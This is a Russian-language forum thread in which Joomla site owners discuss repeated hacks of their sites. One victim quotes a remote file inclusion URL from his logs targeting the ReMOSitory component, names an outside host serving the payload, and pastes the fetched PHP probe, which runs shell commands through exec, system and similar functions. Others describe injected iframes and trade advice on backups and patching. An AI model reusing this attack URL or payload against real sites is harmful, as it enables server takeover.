Безопасность сайта на CMS Joomla!

Народ...может я не в ту категорию запостил эту тему...но вот я столкнулся с проблемой...Уже 2 моих саята были подвергнуты атаке хакеров, и оба подобными способами...я просмотрел логи сервера... своего хостинга..через с панель и вот что обнаружл...

http://название сайта/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://другой сайт /файл.txt?

Вот меня интерисует...как защитить свой сайт..и где я могу прочитать по безопасности джумла...

 

Ответ: Безопасность сайта на CMS Joomla!

Эмуляция Joomla! Register Globals: OFF
Register Globals: OFF

У меня всё вырублено..а ремосистори стоял последний..я его с офф сайта скачал... ща почитаю мануал по безопасности...еси что обращусь...спасибо большое за ссылочку.

 

Ответ: Безопасность сайта на CMS Joomla!

А какой номер у версии ReMosItory, которая предполагается последней?

 

Ответ: Безопасность сайта на CMS Joomla!

у меня

3,42 ща пропатчил джумлу на 1,0,13 подожду до завтра..погляжу на логи..

кстати..а мне хотелось бы узнать...что именно взломщик получает через эту уязвимость... что я писал выше..я проходил по ссылкке и открывается текстовый документ... хотелось бы узнать какие перспективы перед ним открываются...

 

Ответ: Безопасность сайта на CMS Joomla!

да, интересный вопрос - в логах просто попытка взлома или есть последствия удачной попытки взлома?

 

Ответ: Безопасность сайта на CMS Joomla!

Ну тот сайт который был первый взломан...я даже не сразу чухнул в чём дело...стал грешить на хостинг..что они что то настраивают...потом поглядел логи...тоже самое... тот сайт сломали... но там я не ставил пароль через спанель на администрирование... Не думал что тот сайт кому то нужен будет... что бы его ещё ломать... а этот мой более посещаемый...я с начала самого после установки запаролил... Но несмотря на это... в первый раз...после таки у меня перестала работать SEO ...я опять стал грешить на хостинг что мол у них там что то с mod_rewrite потом решил посмотреть логи и наткнулся на тоже самое что было на том моём сайте...

Вот за сегодня уже 3 попытки тоже самого что я писал выше..но сайт вроде пока работает... .htaccess у меня есть .. я блокировал домены и айпи с которых производилась эта вещь..но я знаю это капля в море... сменить айпи не трудно... прочитал мануал по безопасности... вроде всё что там написано у меня уже есть... я вот решил может выложу вам код того что бывает в этих текстовых документах..может вы поглядите и поставите диагноз..ато ломают ломают..так ведь и поломать могут..

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


http://www.isslimited.net/id.txt? это один из тех доменов которые бывают в логах...

 

Ответ: Безопасность сайта на CMS Joomla!

Joomla.Org опять сломали уже второй раз за неделю, если уж разаботчик не может защитить себя что тогда говорить про обычных юзеров, зато исправно списуют все взломы на сторонние компонненты,
вы наверно сажете "джумла безопасна, просто компоненты стороние не ставте"
вобщем не вериться в это, или Joomla.Org ставит непроверенные компоненты?
по большому счету джумла всего лиш платформа для сторонних компонентов, и наверно ни один сайт не использует "чистую" джумлу.

сори если не туда запостил, не создавать же отдельную тему,

p.s.
Это не наезд на джумлу, просто поймите пользователя который узнает сначала что по всей росии бмбят сторонние компоненнты, потом ломают главный оффсайт джумлы чуть не каждый день, тут задумаешся

 

Ответ: Безопасность сайта на CMS Joomla!

Нет систем которые нельзя взломать. Это вопрос времени и прилогаемых сил.
Любой сайт подвержен взлому, некоторые популярные cms, удостаиваются, особого внимания хакеров, поэтому и уязвиности в них находят быстрее. И ими пользуются.
Например одна из причин бажности IE -это его популярность : ))
Все ИМХО. Джумла - форева!

 

Ответ: Безопасность сайта на CMS Joomla!

А как лечить? Гугл постоянно банит, пользователи не могут войти, что можно предпринять?

 

Ответ: Безопасность сайта на CMS Joomla!

ну ломают и хорошо. я бы нервничал если бы не ломали- тогда жди беды)
а так все дыры известны, способы известны, бек апы готовы, хостер хороший друг. Ломанут- закроем, исправим, соберем информацию о том кто это сделал. На войне как на войне)

Чего бояться то? Все кричат взлом взлом. Как будто вам никто не поможет и не посоветует после взлома. Мы посоветуем, а если башка есть на плечах сайт после взлома еще лучше станет. Если бы мы жили в идеальном мире то было бы неинтересно.

Я вообще больше опасаюсь не взлома Joomla, а физического уничтожения сервака) ДДОСа, хотя бек апы сайтов у меня лежат и на жестком и на дисках. Так что при любом раскладе сайт останется жив) А при многократных взломах одного сайта, те кто это делают рискуют попасться. Причем серьезно.

 

Ответ: Безопасность сайта на CMS Joomla!

а ты поставь дырявый компонент)))) для разнообразия, а еще лучше парочку.

 

Ответ: Безопасность сайта на CMS Joomla!

Инфа к размышлению для ленивых.
В общем позавчера взломали у меня несколько сайтов. Взлом был 25.09 в 19:17
Во всех index.html и index.php был добавлен скрипт и ифрейм через который троян лез. На конфе joomlaforum.ru была инфа, что это через FTP троян делает, но не похоже. Т.к. в моём FTP клиенте около 10 сайтов. Взломаны были 6. Скорее всего взломаны были сайты на джумле версий ниже 1.13 Ну и конечно настройки безопасности, о которых выше говорилось. Каюсь - ленив иногда обновлятся вовремя и т.д.

 

Ответ: Безопасность сайта на CMS Joomla!

У меня сайт на 1.13, взломали до того как проапдейтил. Тоже самое с индексами. Пока что поиски залитого скрипта результтов не дали.
Все индексы на хостинге поражены.

ЗЫ ну очень не хочется сносить сайт и заново всё строить.

 

Ответ: Безопасность сайта на CMS Joomla!

-=Luc!fer=-, для этого должны быть свежие бекапы, если вы их не делали, это ваша большая беда и урок

 

Ответ: Безопасность сайта на CMS Joomla!

Народ подскажите где взять обновление для русской версии 1.0.13
я вообще находил, но непонятно для какой версии и ссылки на инструкции на англоязычные сайты.
Что-то немогу найти обновление 1.0.13 - 1.0.14 для русской и документацию по обновлению на русском

 

Ответ: Безопасность сайта на CMS Joomla!

Аналогичная беда.
Причем уже который раз ставлю Джумлу заново и уже который раз сайт ломают За-дол-ба-ло!

Что это может быть? И как избавиться? Никаккие нафиг бэкапы не помогают!